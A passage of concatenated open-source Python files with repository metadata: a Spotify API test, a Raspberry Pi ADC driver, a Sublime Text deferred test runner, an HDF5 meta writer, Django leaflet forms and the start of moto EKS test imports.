"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "8228"
},
{
"name": "HTML",
"bytes": "14954"
},
{
"name": "JavaScript",
"bytes": "36176"
},
{
"name": "Python",
"bytes": "2972"
}
],
"symlink_target": ""
}
|
import os
import pytest
from spotify.auth import OAuth
from spotify.client import Client
CLIENT_ID = os.environ['SPOTAPI_CLIENT_ID']
CLIENT_SECRET = os.environ['SPOTAPI_CLIENT_SECRET']
REFRESH_TOKEN = os.environ['SPOTAPI_REFRESH_TOKEN']
FRANK_ZAPPA = '6ra4GIOgCZQZMOaUECftGN'
@pytest.fixture
def spotify_auth():
auth = OAuth(CLIENT_ID, CLIENT_SECRET)
return auth
@pytest.fixture
def ccspotify(spotify_auth):
"""
Spotify client authorized with client credentials.
"""
client = Client(spotify_auth)
client.auth.request_client_credentials()
print(client.auth.token)
return client
def test_get_artist(ccspotify):
frank = ccspotify.api.artist(FRANK_ZAPPA)
assert frank['name'] == 'Frank Zappa'
assert frank['type'] == 'artist'
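# --- Illustrative note (not part of the original module) ---
# These tests expect real Spotify credentials in the environment before they
# can run, e.g. (values elided):
#
#     export SPOTAPI_CLIENT_ID=...
#     export SPOTAPI_CLIENT_SECRET=...
#     export SPOTAPI_REFRESH_TOKEN=...
#     pytest tests.py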
|
{
"content_hash": "b8f635f3adc06843c68268ea8a7c255e",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 54,
"avg_line_length": 22.91176470588235,
"alnum_prop": 0.7163029525032092,
"repo_name": "steinitzu/spotify-api",
"id": "1ca7ac626e0e49ef3ebe3ba7966ba8033c7ad33c",
"size": "779",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20464"
}
],
"symlink_target": ""
}
|
__all__ = ['DeltaSigma']
class DeltaSigma:
''' Class for reading from the Delta-Sigma Pi analogue to digital converter. '''
_address = 0x68 # default address for adc1 on the delta-sigma pi
_address2 = 0x69 # default address for adc2 on the delta-sigma pi
_config1 = 0x1C # 28 or 11100
_currentchannel1 = 1 # channel variable for adc1
_config2 = 0x1C # 28 or 11100
_currentchannel2 = 1 # channel variable for adc2
_bitrate = 18 # current bitrate
_signbit = False # signed bit checker
_pga = float(0.5) # current pga setting
_lsb = float(7.8125e-6) # default lsb value for 18 bit
# create a byte array and fill it with initial values to define the size
_adcreading = bytearray()
_adcreading.append(0x00)
_adcreading.append(0x00)
_adcreading.append(0x00)
_adcreading.append(0x00)
global _bus
# local methods
def _updatebyte(self, byte, bit, value):
''' Internal method for setting the value of a single bit within a byte '''
# the default byte value is 0x1C (28)
if value == 0:
# 1 << bit returns 1 shifted over by bit: ex. 1 << 2 returns 100 (4)
# ~ returns the complement: so 100 becomes -101 (-5) ( -x - 1 )
# byte & x returns the bitwise and: so 0x1c & -101 returns 11000 (24)
return byte & ~(1 << bit)
elif value == 1:
return byte | (1 << bit)
def _checkbit(self, byte, bit):
''' Internal method for reading the value of a single bit within a byte '''
if byte & (1 << bit):
return 1
else:
return 0
def _twos_comp(self, val, bits):
''' Internal method for calculating the two's complement of a value with the given number of bits '''
if ((val & (1 << (bits - 1))) != 0):
val = val - (1 << bits)
return val
def _setchannel(self, channel):
''' Internal method for updating the config to the selected channel '''
if channel < 5:
if channel != self._currentchannel1:
if channel == 1:
self._config1 = self._updatebyte(self._config1, 5, 0)
self._config1 = self._updatebyte(self._config1, 6, 0)
self._currentchannel1 = 1
if channel == 2:
self._config1 = self._updatebyte(self._config1, 5, 1)
self._config1 = self._updatebyte(self._config1, 6, 0)
self._currentchannel1 = 2
if channel == 3:
self._config1 = self._updatebyte(self._config1, 5, 0)
self._config1 = self._updatebyte(self._config1, 6, 1)
self._currentchannel1 = 3
if channel == 4:
self._config1 = self._updatebyte(self._config1, 5, 1)
self._config1 = self._updatebyte(self._config1, 6, 1)
self._currentchannel1 = 4
else:
if channel != self._currentchannel2:
if channel == 5:
self._config2 = self._updatebyte(self._config2, 5, 0)
self._config2 = self._updatebyte(self._config2, 6, 0)
self._currentchannel2 = 5
if channel == 6:
self._config2 = self._updatebyte(self._config2, 5, 1)
self._config2 = self._updatebyte(self._config2, 6, 0)
self._currentchannel2 = 6
if channel == 7:
self._config2 = self._updatebyte(self._config2, 5, 0)
self._config2 = self._updatebyte(self._config2, 6, 1)
self._currentchannel2 = 7
if channel == 8:
self._config2 = self._updatebyte(self._config2, 5, 1)
self._config2 = self._updatebyte(self._config2, 6, 1)
self._currentchannel2 = 8
return
def __init__(self, bus, address = 0x68, address2 = 0x69, rate = 18):
''' Initialize DeltaSigma object with i2caddress '''
self._bus = bus
self._address = address
self._address2 = address2
self.setBitRate(rate)
def read_voltage(self, channel):
''' Returns the voltage from the selected adc channel (1 to 8)'''
raw = self.read_raw(channel)
if self._signbit:
voltage = (raw * (self._lsb / self._pga)) - 2.048
else:
voltage = float(raw * (self._lsb / self._pga))
return float(voltage)
def read_differential(self, channel1, channel2):
''' Returns a differential voltage reading between two channels '''
voltage1 = self.read_voltage(channel1)
voltage2 = self.read_voltage(channel2)
return float(voltage2 - voltage1)
def read_channel(self, channel):
''' Returns voltage reading for a designated channel on the Delta Sigma ADC '''
if channel > 8:
raise TypeError("That channel is not valid")
else:
return float(self.read_differential(channel, channel + 8))
def read_raw(self, channel):
''' Reads the raw value from the selected ADC channel '''
h = 0
l = 0
m = 0
s = 0
self._setchannel(channel)
if channel < 5:
config = self._config1
address = self._address
else:
config = self._config2
address = self._address2
while True:
_adcreading = self._bus.read_i2c_block_data(address, config)
if self._bitrate == 18:
h = _adcreading[0]
m = _adcreading[1]
l = _adcreading[2]
s = _adcreading[3]
else:
h = _adcreading[0]
m = _adcreading[1]
s = _adcreading[2]
if self._checkbit(s, 7) == 0:
break
self._signbit = False
t = 0.0
if self._bitrate == 18:
t = ((h & 0b00000011) << 16) | (m << 8) | l
self._signbit = bool(self._checkbit(t, 17))
if self._signbit:
t = self._updatebyte(t, 17, 0)
if self._bitrate == 16:
t = (h << 8) | m
self._signbit = bool(self._checkbit(t, 15))
if self._signbit:
t = self._updatebyte(t, 15, 0)
if self._bitrate == 14:
t = ((h & 0b00111111) << 8) | m
self._signbit = bool(self._checkbit(t, 13))
if self._signbit:
t = self._updatebyte(t, 13, 0)
if self._bitrate == 12:
t = ((h & 0b00001111) << 8) | m
self._signbit = bool(self._checkbit(t, 11))
if self._signbit:
t = self._updatebyte(t, 11, 0)
return t
def set_pga(self, gain):
'''
PGA Gain Selection:
1 = 1x
2 = 2x
4 = 4x
8 = 8x
'''
if gain == 1:
self._config1 = self._updatebyte(self._config1, 0, 0)
self._config1 = self._updatebyte(self._config1, 1, 0)
self._config2 = self._updatebyte(self._config2, 0, 0)
self._config2 = self._updatebyte(self._config2, 1, 0)
self._pga = 0.5
if gain == 2:
self._config1 = self._updatebyte(self._config1, 0, 1)
self._config1 = self._updatebyte(self._config1, 1, 0)
self._config2 = self._updatebyte(self._config2, 0, 1)
self._config2 = self._updatebyte(self._config2, 1, 0)
self._pga = 1
if gain == 4:
self._config1 = self._updatebyte(self._config1, 0, 0)
self._config1 = self._updatebyte(self._config1, 1, 1)
self._config2 = self._updatebyte(self._config2, 0, 0)
self._config2 = self._updatebyte(self._config2, 1, 1)
self._pga = 2
if gain == 8:
self._config1 = self._updatebyte(self._config1, 0, 1)
self._config1 = self._updatebyte(self._config1, 1, 1)
self._config2 = self._updatebyte(self._config2, 0, 1)
self._config2 = self._updatebyte(self._config2, 1, 1)
self._pga = 4
self._bus.write_byte(self._address, self._config1)
self._bus.write_byte(self._address2, self._config2)
return
def setBitRate(self, rate):
'''
Sample rate and resolution
12 = 12 bit (240 SPS Max)
14 = 14 bit (60 SPS Max)
16 = 16 bit (15 SPS Max)
18 = 18 bit (3.75 SPS Max)
'''
if rate == 12:
self._config1 = self._updatebyte(self._config1, 2, 0)
self._config1 = self._updatebyte(self._config1, 3, 0)
self._config2 = self._updatebyte(self._config2, 2, 0)
self._config2 = self._updatebyte(self._config2, 3, 0)
self._bitrate = 12
self._lsb = 0.0005
if rate == 14:
self._config1 = self._updatebyte(self._config1, 2, 1)
self._config1 = self._updatebyte(self._config1, 3, 0)
self._config2 = self._updatebyte(self._config2, 2, 1)
self._config2 = self._updatebyte(self._config2, 3, 0)
self._bitrate = 14
self._lsb = 0.000125
if rate == 16:
self._config1 = self._updatebyte(self._config1, 2, 0)
self._config1 = self._updatebyte(self._config1, 3, 1)
self._config2 = self._updatebyte(self._config2, 2, 0)
self._config2 = self._updatebyte(self._config2, 3, 1)
self._bitrate = 16
self._lsb = 0.00003125
if rate == 18:
self._config1 = self._updatebyte(self._config1, 2, 1)
self._config1 = self._updatebyte(self._config1, 3, 1)
self._config2 = self._updatebyte(self._config2, 2, 1)
self._config2 = self._updatebyte(self._config2, 3, 1)
self._bitrate = 18
self._lsb = 0.0000078125
self._bus.write_byte(self._address, self._config1)
self._bus.write_byte(self._address2, self._config2)
return
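# --- Usage sketch (illustrative only, not part of the original module) ---
# Reading a single-ended channel on a Raspberry Pi, assuming the python-smbus
# package is installed and the board sits on I2C bus 1 at the default
# addresses 0x68/0x69:
#
#     import smbus
#     adc = DeltaSigma(smbus.SMBus(1), 0x68, 0x69, rate=18)
#     adc.set_pga(1)                     # gain of 1x
#     print(adc.read_voltage(1))         # voltage on channel 1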
|
{
"content_hash": "4e962d49b036e8461401d8a6f76f7fb0",
"timestamp": "",
"source": "github",
"line_count": 259,
"max_line_length": 81,
"avg_line_length": 31.772200772200772,
"alnum_prop": 0.6306963179001094,
"repo_name": "dhhagan/ADCPi",
"id": "e03e7da184f4819112a4136173a04face56e1bcc",
"size": "8229",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ADCPi/adcpi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9754"
}
],
"symlink_target": ""
}
|
from unittest import runner
import sys, time, os, sublime
class DeferringTextTestRunner(runner.TextTestRunner):
r'''deferred test runner.
This test runner runs tests in deferred slices. It gives
back control to sublime text, such that it can draw views,
do syntax highlighting and whatever.
'''
def run(self, test):
"Run the given test case or test suite."
result = self._makeResult()
runner.registerResult(result)
result.failfast = self.failfast
result.buffer = self.buffer
startTime = time.time()
startTestRun = getattr(result, 'startTestRun', None)
if startTestRun is not None:
startTestRun()
deferred = test(result)
def _stop_testing():
stopTime = time.time()
timeTaken = stopTime - startTime
result.printErrors()
if hasattr(result, 'separator2'):
self.stream.writeln(result.separator2)
run = result.testsRun
self.stream.writeln("Ran %d test%s in %.3fs" %
(run, run != 1 and "s" or "", timeTaken))
self.stream.writeln()
expectedFails = unexpectedSuccesses = skipped = 0
try:
results = map(len, (result.expectedFailures,
result.unexpectedSuccesses,
result.skipped))
except AttributeError:
pass
else:
expectedFails, unexpectedSuccesses, skipped = results
infos = []
if not result.wasSuccessful():
self.stream.write("FAILED")
failed, errored = map(len, (result.failures, result.errors))
if failed:
infos.append("failures=%d" % failed)
if errored:
infos.append("errors=%d" % errored)
else:
self.stream.write("OK")
if skipped:
infos.append("skipped=%d" % skipped)
if expectedFails:
infos.append("expected failures=%d" % expectedFails)
if unexpectedSuccesses:
infos.append("unexpected successes=%d" % unexpectedSuccesses)
if infos:
self.stream.writeln(" (%s)" % (", ".join(infos),))
else:
self.stream.write("\n")
return result
def _wait_condition():
result = self.condition()
if not result:
assert (time.time() - self.condition_start_time) < 10, "Timeout, waited longer than 10s till condition true"
sublime.set_timeout(_wait_condition, 10)
else:
sublime.set_timeout(_continue_testing, 10)
def _continue_testing():
try:
delay = next(deferred)
if callable(delay):
self.condition = delay
self.condition_start_time = time.time()
sublime.set_timeout(_wait_condition, 10)
else:
if not isinstance(delay, int):
delay = 10
sublime.set_timeout(_continue_testing, delay)
except StopIteration:
stopTestRun = getattr(result, 'stopTestRun', None)
if stopTestRun is not None:
stopTestRun()
_stop_testing()
sublime.set_timeout(_continue_testing, 10)
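# --- Illustrative sketch (not part of the original module) ---
# run() expects `test(result)` to return a generator. Each yielded value is
# interpreted as either an int (milliseconds to wait before resuming) or a
# zero-argument callable (a condition polled every 10 ms, for up to ~10 s,
# until it returns truthy). A hypothetical deferred test body could therefore
# look like this:
#
#     def run(self, result):
#         view = sublime.active_window().new_file()
#         yield 100                          # give Sublime 100 ms to draw
#         yield lambda: view.is_loaded()     # wait until the view is ready
#         # ... continue with assertions ...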
|
{
"content_hash": "3612adc5322c4da43b9a0ba935f30d57",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 124,
"avg_line_length": 34.794117647058826,
"alnum_prop": 0.5190194420963652,
"repo_name": "randy3k/SublimePluginUnitTestHarness",
"id": "65d4e2624647d3b52be291700f1007cbd8298bc1",
"size": "3549",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sublime_unittest/runner.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "24891"
}
],
"symlink_target": ""
}
|
"""Implementation of odin_data Meta Writer
This module is passed meta data messages for a single acquisition which it writes to disk.
Will need to be subclassed by detector specific implementation.
Matt Taylor, Diamond Light Source
"""
import os
from time import time
import logging
import h5py
from odin_data import _version as versioneer
from odin_data.util import construct_version_dict
from .hdf5dataset import HDF5Dataset, Int64HDF5Dataset
# Data message parameters
FRAME = "frame"
OFFSET = "offset"
RANK = "rank"
CREATE_DURATION = "create_duration"
WRITE_DURATION = "write_duration"
FLUSH_DURATION = "flush_duration"
CLOSE_DURATION = "close_duration"
MESSAGE_TYPE_ID = "parameter"
# Configuration items
DIRECTORY = "directory"
FILE_PREFIX = "file_prefix"
FLUSH_FRAME_FREQUENCY = "flush_frame_frequency"
FLUSH_TIMEOUT = "flush_timeout"
def require_open_hdf5_file(func):
"""A decorator to verify the HDF5 file is open before calling the wrapped method
If the HDF5 file is currently open for writing, call the method, else log the reason
the file is not open
NOTE: This should only be used on MetaWriter methods (that take self as the first
argument)
"""
def wrapper(*args, **kwargs):
writer = args[0] # Extract class instance (self) from args
if writer.file_open:
# It is safe to call the wrapped method
return func(*args, **kwargs)
# It is not safe to call the wrapped method - log the reason why
if writer.finished:
reason = "Already finished writing"
else:
reason = "Have not received startacquisition yet"
writer._logger.error(
"%s | Cannot call %s - File not open - %s",
writer._name,
func.__name__,
reason,
)
return wrapper
class MetaWriter(object):
"""This class handles meta data messages and writes parameters to disk"""
FILE_SUFFIX = "_meta.h5"
CONFIGURE_PARAMETERS = [
DIRECTORY,
FILE_PREFIX,
FLUSH_FRAME_FREQUENCY,
FLUSH_TIMEOUT,
]
# Detector-specific parameters received on per-frame meta message
DETECTOR_WRITE_FRAME_PARAMETERS = []
def __init__(self, name, directory, process_count):
"""
Args:
name(str): Unique name to construct file path and to include in
log messages
directory(str): Directory to create the meta file in
process_count(int): Total number of processes we will receive data from
"""
self._logger = logging.getLogger(self.__class__.__name__)
# Config
self.directory = directory
self.file_prefix = None
self.flush_frame_frequency = 100
self.flush_timeout = 1
# Status
self.full_file_path = None
self.write_count = 0
self.finished = False
self.write_timeout_count = 0
# Internal parameters
self._name = name
self._processes_running = [False] * process_count
self._last_flushed = time() # Seconds since epoch
self._frames_since_flush = 0
self._hdf5_file = None
self._datasets = dict(
(dataset.name, dataset)
for dataset in self._define_datasets() + self._define_detector_datasets()
)
# Child class parameters
self._frame_data_map = dict() # Map of frame number to detector data
self._writers_finished = False
self._detector_finished = True # See stop_when_detector_finished
@staticmethod
def _define_datasets():
return [
Int64HDF5Dataset(FRAME),
Int64HDF5Dataset(OFFSET),
Int64HDF5Dataset(CREATE_DURATION, cache=False),
Int64HDF5Dataset(WRITE_DURATION),
Int64HDF5Dataset(FLUSH_DURATION),
Int64HDF5Dataset(CLOSE_DURATION, cache=False),
]
@staticmethod
def _define_detector_datasets():
return []
@property
def file_open(self):
return self._hdf5_file is not None
@property
def active_process_count(self):
return self._processes_running.count(True)
def _generate_full_file_path(self):
prefix = self.file_prefix if self.file_prefix is not None else self._name
self.full_file_path = os.path.join(
self.directory, "{}{}".format(prefix, self.FILE_SUFFIX)
)
return self.full_file_path
def _create_file(self, file_path, dataset_size):
self._logger.debug(
"%s | Opening file %s - Expecting %d frames",
self._name,
file_path,
dataset_size,
)
try:
self._hdf5_file = h5py.File(file_path, "w", libver="latest")
except IOError as error:
self._logger.error(
"%s | Failed to create file:\n%s: %s",
self._name,
error.__class__.__name__,
error.message,
)
return
self._create_datasets(dataset_size)
# Datasets created after this point will not be SWMR-readable
self._hdf5_file.swmr_mode = True
@require_open_hdf5_file
def _close_file(self):
self._logger.info("%s | Closing file", self._name)
self._flush_datasets()
self._hdf5_file.close()
self._hdf5_file = None
@require_open_hdf5_file
def _create_datasets(self, dataset_size):
"""Add predefined datasets to HDF5 file and store handles
Args:
dataset_size(int): Initial size (number of frames) to allocate for each dataset
"""
self._logger.debug("%s | Creating datasets", self._name)
for dataset in self._datasets.values():
dataset_handle = self._hdf5_file.create_dataset(
name=dataset.name,
shape=dataset.shape,
maxshape=dataset.maxshape,
dtype=dataset.dtype,
fillvalue=dataset.fillvalue,
)
dataset.initialise(dataset_handle, dataset_size)
@require_open_hdf5_file
def _add_dataset(self, dataset_name, data, dataset_size=None):
"""Add a new dataset with the given data
Args:
dataset_name(str): Name of dataset
data(np.ndarray): Data to initialise HDF5 dataset with
dataset_size(int): Dataset size - required if more data will be added
"""
self._logger.debug("%s | Adding dataset %s", self._name, dataset_name)
if dataset_name in self._datasets:
self._logger.debug(
"%s | Dataset %s already created", self._name, dataset_name
)
return
self._logger.debug(
"%s | Creating dataset %s with data:\n%s", self._name, dataset_name, data
)
dataset = HDF5Dataset(dataset_name, dtype=None, fillvalue=None, cache=False)
dataset_handle = self._hdf5_file.create_dataset(name=dataset_name, data=data)
dataset.initialise(dataset_handle, dataset_size)
self._datasets[dataset_name] = dataset
@require_open_hdf5_file
def _add_value(self, dataset_name, value, offset=0):
"""Append a value to the named dataset
Args:
dataset_name(str): Name of dataset
value(): The value to append
offset(int): The offset to add the value at
"""
self._logger.debug("%s | Adding value to %s", self._name, dataset_name)
if dataset_name not in self._datasets:
self._logger.error("%s | No such dataset %s", self._name, dataset_name)
return
self._datasets[dataset_name].add_value(value, offset)
@require_open_hdf5_file
def _add_values(self, expected_parameters, data, offset):
"""Take values of parameters from data and write to datasets at offset
Args:
expected_parameters(list(str)): Parameters to write
data(dict): Set of parameter values
offset(int): Offset to write parameters to in datasets
"""
self._logger.debug("%s | Adding values to datasets", self._name)
for parameter in expected_parameters:
if parameter not in data:
self._logger.error(
"%s | Expected parameter %s not found in %s",
self._name,
parameter,
data,
)
continue
self._add_value(parameter, data[parameter], offset)
@require_open_hdf5_file
def _write_dataset(self, dataset_name, data):
"""Write an entire dataset with the given data
Args:
dataset_name(str): Name of dataset
data(np.ndarray): Data to set HDF5 dataset with
"""
self._logger.debug("%s | Writing entire dataset %s", self._name, dataset_name)
if dataset_name not in self._datasets:
self._logger.error("%s | No such dataset %s", self._name, dataset_name)
return
self._datasets[dataset_name].write(data)
@require_open_hdf5_file
def _write_datasets(self, expected_parameters, data):
"""Take values of parameters from data and write datasets
Args:
expected_parameters(list(str)): Parameters to write
data(dict): Set of parameter values
"""
self._logger.debug("%s | Writing datasets", self._name)
for parameter in expected_parameters:
if parameter not in data:
self._logger.error(
"%s | Expected parameter %s not found in %s",
self._name,
parameter,
data,
)
continue
self._write_dataset(parameter, data[parameter])
@require_open_hdf5_file
def _flush_datasets(self):
self._logger.debug("%s | Flushing datasets", self._name)
for dataset in self._datasets.values():
dataset.flush()
def stop_when_detector_finished(self):
"""Register that it is OK to stop when all detector-specific logic is complete
By default_detector_finished is set to True initially so that this check always
passes. Child classes that need to do their own checks can set this to False in
__ init__ and call stop_when_writers_finished when ready to stop.
"""
self._writers_finished = True
if self._detector_finished:
self._logger.debug("%s | Detector already finished", self._name)
self.stop()
else:
self._logger.debug("%s | Detector not finished", self._name)
def stop_when_writers_finished(self):
"""Register that it is OK to stop when all monitored writers have finished
Child classes can call this when all detector specific logic is complete.
"""
self._detector_finished = True
if self._writers_finished:
self._logger.debug("%s | Writers already finished", self._name)
self.stop()
else:
self._logger.debug("%s | Writers not finished", self._name)
def stop(self):
self._close_file()
self.finished = True
self._logger.info("%s | Finished", self._name)
def status(self):
"""Return current status parameters"""
return dict(
full_file_path=self.full_file_path,
num_processors=self.active_process_count,
written=self.write_count,
writing=self.file_open and not self.finished,
)
def configure(self, configuration):
"""Configure the writer with a set of one or more parameters
Args:
configuration(dict): Configuration parameters
Returns:
error(None/str): None if successful else an error message
"""
error = None
for parameter, value in configuration.items():
if parameter in self.CONFIGURE_PARAMETERS:
self._logger.debug(
"%s | Setting %s to %s", self._name, parameter, value
)
setattr(self, parameter, value)
else:
error = "Invalid parameter {}".format(parameter)
self._logger.error("%s | %s", self._name, error)
return error
def request_configuration(self):
"""Return the current configuration
Returns:
configuration(dict): Dictionary of current configuration parameters
"""
configuration = dict(
(parameter, getattr(self, parameter))
for parameter in self.CONFIGURE_PARAMETERS
)
return configuration
# Methods for handling various message types
@property
def message_handlers(self):
"""Dictionary of message type to handler method
This should be overridden by child classes to add additional handlers
Returns:
dict: message type handler methods
"""
message_handlers = {
"startacquisition": self.handle_start_acquisition,
"createfile": self.handle_create_file,
"writeframe": self.handle_write_frame,
"closefile": self.handle_close_file,
"stopacquisition": self.handle_stop_acquisition,
}
message_handlers.update(self.detector_message_handlers)
return message_handlers
@property
def detector_message_handlers(self):
return {}
def process_message(self, header, data):
"""Process a message from a data socket
This is main entry point for handling any type of message and calling
the appropriate method.
Look up the appropriate message handler based on the message type and
call it.
Leading underscores on a handler function definition parameter mean it
does not use the argument.
This should be overridden by child classes to handle any additional messages.
Args:
header(str): The header message part
data(str): The data message part (a json string or a data blob)
"""
handler = self.message_handlers.get(header[MESSAGE_TYPE_ID], None)
if handler is not None:
handler(header["header"], data)
else:
self._logger.error(
"%s | Unknown message type: %s", self._name, header[MESSAGE_TYPE_ID]
)
def handle_start_acquisition(self, header, _data):
"""Prepare the data file with the number of frames to write"""
self._logger.debug("%s | Handling start acquisition message", self._name)
if self._processes_running[header[RANK]]:
self._logger.error(
"%s | Received additional startacquisition from process rank %d - ignoring",
self._name,
header[RANK],
)
return
self._processes_running[header[RANK]] = True
self._logger.debug(
"%s | Received startacquisition message from rank %d - %d processes running",
self._name,
header[RANK],
self.active_process_count,
)
if not self.file_open:
self._create_file(self._generate_full_file_path(), header["totalFrames"])
def handle_create_file(self, _header, data):
self._logger.debug("%s | Handling create file message", self._name)
self._add_value(CREATE_DURATION, data[CREATE_DURATION])
def handle_write_frame(self, _header, data):
self._logger.debug("%s | Handling write frame message", self._name)
# TODO: Handle getting more frames than expected because of rewinding?
write_frame_parameters = [FRAME, OFFSET, WRITE_DURATION, FLUSH_DURATION]
self._add_values(write_frame_parameters, data, data[OFFSET])
# Here we keep track of whether we need to write to disk based on:
# - Time since last write
# - Number of write frame messages since last write
# Reset timeout count to 0
self.write_timeout_count = 0
self.write_count += 1
self._frames_since_flush += 1
# Write detector meta data for this frame, now that we know the offset
self.write_detector_frame_data(data[FRAME], data[OFFSET])
flush_required = (
time() - self._last_flushed >= self.flush_timeout
or self._frames_since_flush >= self.flush_frame_frequency
)
if flush_required:
self._flush_datasets()
self._last_flushed = time()
self._frames_since_flush = 0
def write_detector_frame_data(self, frame, offset):
"""Write the frame data to at the given offset
Args:
frame(int): Frame to write
offset(int): Offset in datasets to write the frame data to
"""
if not self.DETECTOR_WRITE_FRAME_PARAMETERS:
# No detector specific data to write
return
self._logger.debug("%s | Writing detector data for frame %d", self._name, frame)
if frame not in self._frame_data_map:
self._logger.error(
"%s | No detector meta data stored for frame %d", self._name, frame
)
return
data = self._frame_data_map[frame]
self._add_values(self.DETECTOR_WRITE_FRAME_PARAMETERS, data, offset)
def handle_close_file(self, _header, data):
self._logger.debug("%s | Handling close file message", self._name)
self._add_value(CLOSE_DURATION, data[CLOSE_DURATION])
def handle_stop_acquisition(self, header, _data):
"""Register that a process has finished and stop if it is the last one"""
if not self._processes_running[header[RANK]]:
self._logger.error(
"%s | Received stopacquisition from process rank %d before start - ignoring",
self._name,
header[RANK],
)
return
self._logger.debug(
"%s | Received stopacquisition from rank %d", self._name, header[RANK]
)
self._processes_running[header[RANK]] = False
if not any(self._processes_running):
self._logger.info("%s | Last processor stopped", self._name)
self.stop_when_detector_finished()
@staticmethod
def get_version():
return "odin-data", construct_version_dict(versioneer.get_versions()["version"])
|
{
"content_hash": "eaa0eeed92100b022c03ee4ceacb1d01",
"timestamp": "",
"source": "github",
"line_count": 556,
"max_line_length": 93,
"avg_line_length": 33.32374100719424,
"alnum_prop": 0.594559585492228,
"repo_name": "percival-detector/odin-data",
"id": "2374f07f4d690373a49ecb82c2f0cc18aaeac184",
"size": "18528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tools/python/odin_data/meta_writer/meta_writer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "26513"
},
{
"name": "C++",
"bytes": "1370975"
},
{
"name": "CMake",
"bytes": "41498"
},
{
"name": "CSS",
"bytes": "1144"
},
{
"name": "HTML",
"bytes": "7416"
},
{
"name": "Java",
"bytes": "29333"
},
{
"name": "JavaScript",
"bytes": "9693"
},
{
"name": "Python",
"bytes": "331800"
},
{
"name": "Shell",
"bytes": "6270"
}
],
"symlink_target": ""
}
|
from django import forms
from localflavor.gb.forms import GBPostcodeField
from core.helpers import geocode
from .models import Leaflet, LeafletImage
import constants
class ImageForm(forms.Form):
image = forms.ImageField(widget=forms.FileInput(
attrs={'accept': "image/*;capture=camera"}), error_messages={'required': 'Please add a photo or skip this step'})
class FrontPageImageForm(ImageForm):
pass
class BackPageImageForm(ImageForm):
pass
class InsidePageImageForm(ImageForm):
pass
class PostcodeForm(forms.Form):
postcode = GBPostcodeField(error_messages={'required': 'Please enter a valid UK postcode'})
wgs84_lon = forms.CharField(
required=False, max_length=100, widget=forms.HiddenInput())
wgs84_lat = forms.CharField(
required=False, max_length=100, widget=forms.HiddenInput())
constituency = forms.CharField(
required=False, max_length=255, widget=forms.HiddenInput())
def clean(self):
data = super(PostcodeForm, self).clean()
if not data.get('postcode'):
raise forms.ValidationError("Please enter a full valid UK postcode")
postcode = self.cleaned_data['postcode']
self.geo_data = geocode(postcode)
if not self.geo_data or 'constituency' not in self.geo_data:
raise forms.ValidationError("Please enter a full valid UK postcode")
data['constituency'] = self.geo_data['constituency']
data['wgs84_lon'] = self.geo_data['wgs84_lon']
data['wgs84_lat'] = self.geo_data['wgs84_lat']
return data
class LeafletDetailsFrom(forms.ModelForm):
class Meta:
model = Leaflet
class LeafletReviewFrom(forms.ModelForm):
class Meta:
model = Leaflet
fields = ('reviewed', )
class PeopleModelChoiceField(forms.ModelChoiceField):
def label_from_instance(self, obj):
if obj.current_party:
party_name = obj.current_party.party.party_name
else:
party_name = "Independent"
return u"{0} ({1})".format(
obj.name,
party_name,
)
class PeopleForm(forms.Form):
def __init__(self, *args, **kwargs):
super(PeopleForm, self).__init__(*args, **kwargs)
if 'people' in kwargs['initial']:
self.fields['people'] = \
PeopleModelChoiceField(
queryset=kwargs['initial']['_people'],
widget=forms.RadioSelect,
empty_label="Not listed",
required=False)
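# --- Illustrative sketch (not part of the original module) ---
# Validating a postcode submission, assuming core.helpers.geocode can reach
# its lookup service. On success the cleaned data is augmented with the
# geocoded constituency and WGS84 coordinates:
#
#     form = PostcodeForm(data={'postcode': 'SW1A 1AA'})
#     if form.is_valid():
#         constituency = form.cleaned_data['constituency']
#         lon = form.cleaned_data['wgs84_lon']
#         lat = form.cleaned_data['wgs84_lat']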
|
{
"content_hash": "45c5a5fa4ffcfdf8a685468b4a5b3743",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 121,
"avg_line_length": 30.321428571428573,
"alnum_prop": 0.6368276403612093,
"repo_name": "JustinWingChungHui/electionleaflets",
"id": "97007e015e0284ab89f84aec8d0834205f5c7f7f",
"size": "2547",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "electionleaflets/apps/leaflets/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "23074"
},
{
"name": "Cucumber",
"bytes": "7808"
},
{
"name": "HTML",
"bytes": "121455"
},
{
"name": "Handlebars",
"bytes": "446"
},
{
"name": "JavaScript",
"bytes": "69039"
},
{
"name": "Python",
"bytes": "160654"
},
{
"name": "Ruby",
"bytes": "165"
}
],
"symlink_target": ""
}
|
from __future__ import annotations
import sys
from copy import deepcopy
from datetime import datetime
from pathlib import Path
from unittest import mock
from urllib.parse import ParseResult, urlsplit
import pytest
import yaml
from _pytest._code import ExceptionInfo
from botocore.exceptions import ClientError
from freezegun import freeze_time
from moto import mock_eks
from moto.core import DEFAULT_ACCOUNT_ID
from moto.core.exceptions import AWSError
from moto.eks.exceptions import (
InvalidParameterException,
InvalidRequestException,
ResourceInUseException,
ResourceNotFoundException,
)
from moto.eks.models import (
CLUSTER_EXISTS_MSG,
CLUSTER_IN_USE_MSG,
CLUSTER_NOT_FOUND_MSG,
CLUSTER_NOT_READY_MSG,
FARGATE_PROFILE_EXISTS_MSG,
FARGATE_PROFILE_NEEDS_SELECTOR_MSG,
FARGATE_PROFILE_NOT_FOUND_MSG,
FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE,
FARGATE_PROFILE_TOO_MANY_LABELS,
LAUNCH_TEMPLATE_WITH_DISK_SIZE_MSG,
LAUNCH_TEMPLATE_WITH_REMOTE_ACCESS_MSG,
NODEGROUP_EXISTS_MSG,
